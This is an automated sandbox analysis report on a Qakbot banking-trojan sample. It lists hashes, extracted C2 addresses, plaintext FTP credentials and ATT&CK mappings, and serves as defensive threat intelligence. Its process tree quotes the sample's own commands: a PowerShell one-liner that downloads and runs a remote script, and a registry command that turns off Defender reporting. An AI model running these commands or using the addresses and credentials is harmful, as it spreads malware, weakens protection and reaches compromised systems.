qakbot | 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

General

Target

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Size

397KB
MD5

a0a9bf99af2c13b678a17f3f7f8b73c8
SHA1

802b22bdd827d1921534d93d31e9df2735156210
SHA256

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80
SHA512

3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Score

10^/10

qakbot 1518695014 banker persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.allens-treasure-house.com/books_files/001.ps1

Extracted

Family

qakbot

Version

322.148

Campaign

1518695014

Credentials

Protocol: ftp
Host:
66.96.133.9
Port:
21
Username:
help
Password:
eT5TerAcnFe6~

Protocol: ftp
Host:
174.123.38.58
Port:
21
Username:
[email protected]
Password:
4BQ1MeeRAwNZEVu

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
[email protected]
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
[email protected]
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
[email protected]
Password:
RoP4Af0RKAAQ74V

C2

179.62.153.88:443

50.198.141.161:2222

69.129.91.38:443

66.189.228.49:995

96.253.104.73:443

71.183.129.113:443

125.25.130.203:995

173.175.174.154:443

162.104.186.175:995

75.109.222.140:995

68.173.55.51:443

78.175.254.43:443

106.159.251.143:995

47.143.83.172:443

71.190.202.120:443

73.136.232.174:995

96.253.104.73:995

192.158.217.32:22

65.153.16.250:993

70.95.129.59:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

28 4416 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

uoytfb.exeuoytfb.exe

pid process

4712 uoytfb.exe
204 uoytfb.exe

flow	pid	process
28	4416	powershell.exe

pid	process
4712	uoytfb.exe
204	uoytfb.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ionh = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Uoytfbo\\uoytfb.exe\""	explorer.exe

Drops file in Windows directory 6 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exeuoytfb.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service	uoytfb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	uoytfb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	uoytfb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	uoytfb.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc	uoytfb.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	uoytfb.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4500 PING.EXE

pid	process
4500	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exeuoytfb.exepowershell.exeuoytfb.exeexplorer.exesihost.exesvchost.exetaskhostw.exeExplorer.EXEsvchost.exe

pid	process
3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
4676	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
4676	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
4676	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
4676	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
4712	uoytfb.exe
4712	uoytfb.exe
4416	powershell.exe
4416	powershell.exe
204	uoytfb.exe
204	uoytfb.exe
204	uoytfb.exe
204	uoytfb.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
3080	explorer.exe
2356	sihost.exe
2356	sihost.exe
2368	svchost.exe
2368	svchost.exe
2448	taskhostw.exe
2448	taskhostw.exe
1164	Explorer.EXE
1164	Explorer.EXE
3172	svchost.exe
3172	svchost.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

uoytfb.exe

pid process

4712 uoytfb.exe

pid	process
4712	uoytfb.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

svchost.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	2788	svchost.exe
Token: SeCreatePagefilePrivilege	2788	svchost.exe
Token: SeShutdownPrivilege	2788	svchost.exe
Token: SeCreatePagefilePrivilege	2788	svchost.exe
Token: SeShutdownPrivilege	2788	svchost.exe
Token: SeCreatePagefilePrivilege	2788	svchost.exe
Token: SeDebugPrivilege	4416	powershell.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exeuoytfb.execmd.exeexplorer.exe

description	pid	process	target process
PID 3992 wrote to memory of 4676	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 3992 wrote to memory of 4676	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 3992 wrote to memory of 4676	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 3992 wrote to memory of 4712	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	uoytfb.exe
PID 3992 wrote to memory of 4712	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	uoytfb.exe
PID 3992 wrote to memory of 4712	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	uoytfb.exe
PID 3992 wrote to memory of 4708	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	reg.exe
PID 3992 wrote to memory of 4708	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	reg.exe
PID 3992 wrote to memory of 4416	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	powershell.exe
PID 3992 wrote to memory of 4416	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	powershell.exe
PID 4712 wrote to memory of 204	4712	uoytfb.exe	uoytfb.exe
PID 4712 wrote to memory of 204	4712	uoytfb.exe	uoytfb.exe
PID 4712 wrote to memory of 204	4712	uoytfb.exe	uoytfb.exe
PID 3992 wrote to memory of 552	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cmd.exe
PID 3992 wrote to memory of 552	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cmd.exe
PID 3992 wrote to memory of 552	3992	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cmd.exe
PID 552 wrote to memory of 4500	552	cmd.exe	PING.EXE
PID 552 wrote to memory of 4500	552	cmd.exe	PING.EXE
PID 552 wrote to memory of 4500	552	cmd.exe	PING.EXE
PID 4712 wrote to memory of 3080	4712	uoytfb.exe	explorer.exe
PID 4712 wrote to memory of 3080	4712	uoytfb.exe	explorer.exe
PID 4712 wrote to memory of 3080	4712	uoytfb.exe	explorer.exe
PID 4712 wrote to memory of 3080	4712	uoytfb.exe	explorer.exe
PID 3080 wrote to memory of 2356	3080	explorer.exe	sihost.exe
PID 3080 wrote to memory of 2356	3080	explorer.exe	sihost.exe
PID 3080 wrote to memory of 2356	3080	explorer.exe	sihost.exe
PID 3080 wrote to memory of 2368	3080	explorer.exe	svchost.exe
PID 3080 wrote to memory of 2368	3080	explorer.exe	svchost.exe
PID 3080 wrote to memory of 2368	3080	explorer.exe	svchost.exe
PID 3080 wrote to memory of 2448	3080	explorer.exe	taskhostw.exe
PID 3080 wrote to memory of 2448	3080	explorer.exe	taskhostw.exe
PID 3080 wrote to memory of 2448	3080	explorer.exe	taskhostw.exe
PID 3080 wrote to memory of 1164	3080	explorer.exe	Explorer.EXE
PID 3080 wrote to memory of 1164	3080	explorer.exe	Explorer.EXE
PID 3080 wrote to memory of 1164	3080	explorer.exe	Explorer.EXE
PID 3080 wrote to memory of 3172	3080	explorer.exe	svchost.exe
PID 3080 wrote to memory of 3172	3080	explorer.exe	svchost.exe
PID 3080 wrote to memory of 3172	3080	explorer.exe	svchost.exe
PID 3080 wrote to memory of 3372	3080	explorer.exe	DllHost.exe
PID 3080 wrote to memory of 3372	3080	explorer.exe	DllHost.exe
PID 3080 wrote to memory of 3372	3080	explorer.exe	DllHost.exe

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3172

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1164

C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
"C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe"
2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3992

C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
"C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe" /C
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4676

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:4708

C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4712

C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe" /C
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:204

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\bksepjahliayxqbggiwtvkkynfxu.txt'"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:552

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
PID:4500

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2368

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2788

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Peripheral Device Discovery

1

T1120

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytf.dat
MD5
7f07f2adfbf1faeb1c2531cfb9bc0376

SHA1
4608e558a3f5947d480e0573c423b6eaa4d8dac9

SHA256
7c212f58d180bd9b22820de5e4304f2efb59801011a9941202c301f4b9e04a27

SHA512
24fb49f4e6765ddd446d9012ff85e60734bd4a64d90ace1c9d3c99c34fa87b7bcbd33af898ea7668bc0f337de92b8c0a09e9a62dbab60c3a2210c5059d0d72c7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8

SHA1
802b22bdd827d1921534d93d31e9df2735156210

SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8

SHA1
802b22bdd827d1921534d93d31e9df2735156210

SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8

SHA1
802b22bdd827d1921534d93d31e9df2735156210

SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Download Submit
memory/1164-153-0x0000000000F90000-0x0000000000FBC000-memory.dmp

Filesize
176KB

Download
memory/1164-155-0x00007FF975AE0000-0x00007FF975AE1000-memory.dmp

Filesize
4KB

Download
memory/2356-147-0x00000000004F0000-0x00000000004F1000-memory.dmp

Filesize
4KB

Download
memory/2356-150-0x00007FF975AE0000-0x00007FF975AE1000-memory.dmp

Filesize
4KB

Download
memory/2356-149-0x00007FF975B8D000-0x00007FF975B8E000-memory.dmp

Filesize
4KB

Download
memory/2356-148-0x0000000000490000-0x00000000004BC000-memory.dmp

Filesize
176KB

Download
memory/2368-156-0x00007FF975AE0000-0x00007FF975AE1000-memory.dmp

Filesize
4KB

Download
memory/2368-154-0x0000000000B10000-0x0000000000B3C000-memory.dmp

Filesize
176KB

Download
memory/2448-159-0x00007FF975AE0000-0x00007FF975AE1000-memory.dmp

Filesize
4KB

Download
memory/2448-158-0x0000000000C90000-0x0000000000CBC000-memory.dmp

Filesize
176KB

Download
memory/2788-134-0x000001CD19290000-0x000001CD19294000-memory.dmp

Filesize
16KB

Download
memory/2788-133-0x000001CD16590000-0x000001CD165A0000-memory.dmp

Filesize
64KB

Download
memory/2788-132-0x000001CD16530000-0x000001CD16540000-memory.dmp

Filesize
64KB

Download
memory/3080-151-0x00000000034F0000-0x00000000034F1000-memory.dmp

Filesize
4KB

Download
memory/3080-146-0x0000000003000000-0x0000000003001000-memory.dmp

Filesize
4KB

Download
memory/3080-145-0x0000000002E60000-0x0000000002E61000-memory.dmp

Filesize
4KB

Download
memory/3080-144-0x00000000014F0000-0x00000000014F1000-memory.dmp

Filesize
4KB

Download
memory/3080-143-0x0000000002E30000-0x0000000002E5F000-memory.dmp

Filesize
188KB

Download
memory/3080-152-0x0000000003550000-0x0000000003551000-memory.dmp

Filesize
4KB

Download
memory/3080-142-0x0000000001020000-0x0000000001088000-memory.dmp

Filesize
416KB

Download
memory/3080-157-0x0000000003520000-0x0000000003521000-memory.dmp

Filesize
4KB

Download
memory/4416-139-0x000002B053106000-0x000002B053108000-memory.dmp

Filesize
8KB

Download
memory/4416-138-0x000002B053103000-0x000002B053105000-memory.dmp

Filesize
8KB

Download
memory/4416-137-0x000002B053100000-0x000002B053102000-memory.dmp

Filesize
8KB

Download
memory/4416-136-0x00007FF954473000-0x00007FF954475000-memory.dmp

Filesize
8KB

Download
memory/4416-135-0x000002B053180000-0x000002B0531A2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads